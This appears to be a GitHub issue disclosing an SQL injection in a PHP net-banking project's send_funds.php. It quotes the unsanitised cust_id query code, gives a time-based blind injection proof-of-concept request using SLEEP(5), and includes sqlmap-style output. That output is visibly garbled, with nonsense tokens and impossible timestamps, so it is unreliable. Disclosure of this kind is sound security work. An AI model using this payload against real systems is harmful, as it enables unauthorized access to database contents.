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## Found a vulnerability #18

Open

New issue

OclickjackingO opened this issue on Sep 5 · O comments

OclickjackingO commented on Sep 5

## Vulnerability file address

net-banking/send\_funds.php from line 9,The \$\_GET['cust\_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the \$id is not protected from sql injection, line 13 \$result0 = \$conn->query(\$sq10); made a sql query,resulting in sql injection

```
if (isset($_GET['cust_id'])) {
        $id = $_GET['cust_id'];
}

$sql0 = "SELECT * FROM customer WHERE cust_id=".$id;
    $result0 = $conn->query($sql0);
    $row0 = $result0->fetch_assoc();
.....
```

## **POC**

```
GET /net-banking/send_funds.php?cust_id=666 AND (SELECT 1043 FROM (SELECT(SLEEP(5)))rbwc) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

## Attack results pictures

```
[19:41:52] [1MFO] testing 'MySQL < 5.0.12 stacked queries (EMICHMARK - comment)'
[39:41:52] [1MFO] testing 'MySQL < 5.0.12 stacked queries (EMICHMARK - comment)'
[39:41:52] [1MFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[39:41:52] [1MFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[39:42:52] [1MFO] and parameter 'Miron query (NULL) = 1 to 20 columns'
[39:42:52] [1MFO] and matically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[39:42:52] [1MFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
```

No one assigned	
Labels	
None yet	
Projects	
None yet	
Milestone	
No milestone	
Development	
No branches or pull requests	

1 participant

Assignees

